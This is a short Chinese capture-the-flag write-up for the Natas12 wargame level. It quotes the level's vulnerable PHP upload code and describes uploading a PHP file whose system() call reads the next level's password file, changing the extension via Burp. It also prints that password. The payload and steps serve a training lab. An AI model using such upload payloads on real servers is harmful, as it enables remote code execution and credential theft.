正文
Natas12 Writeup(文件上传漏洞)
小程序:扫一扫查出行【扫一扫了解最新限行尾号】
复制小程序
Natas12:
文件上传页面,源码如下:
function genRandomString() {
$length = 10;
$characters = "0123456789abcdefghijklmnopqrstuvwxyz";
$string = ""; for ($p = 0; $p < $length; $p++) {
$string .= $characters[mt_rand(0, strlen($characters)-1)];
} return $string;
}function makeRandomPath($dir, $ext) {
do {
$path = $dir."/".genRandomString().".".$ext;
} while(file_exists($path));
return $path;
}function makeRandomPathFromFilename($dir, $fn) {
$ext = pathinfo($fn, PATHINFO_EXTENSION);
return makeRandomPath($dir, $ext);
}if(array_key_exists("filename", $_POST)) {
$target_path = makeRandomPathFromFilename("upload", $_POST["filename"]); if(filesize($_FILES['uploadedfile']['tmp_name']) > 1000) {
echo "File is too big";
} else {
if(move_uploaded_file($_FILES['uploadedfile']['tmp_name'], $target_path)) {
echo "The file <a href=\"$target_path\">$target_path</a> has been uploaded";
} else{
echo "There was an error uploading the file, please try again!";
}
}
} else {
natas12-sourcecode.html
查看源码,发现没做过滤,只是把上传后的文件名及后缀名修改了,思路就是利用文件上传漏洞上传一个PHP文件读取密码。
1.构造一个简单的test.php文件,用于读取/etc/natas_webpass/natas13,代码如下。
<?php
system('cat /etc/natas_webpass/natas13');
?>
2.点击上传php文件,用burp拦截,修改name后缀为php,点击Go,上传成功。
3.URL访问返回的php页面,得到flag。
flag:jmLTY0qiPZBbaKc9341cqPQZBJv7MQbY
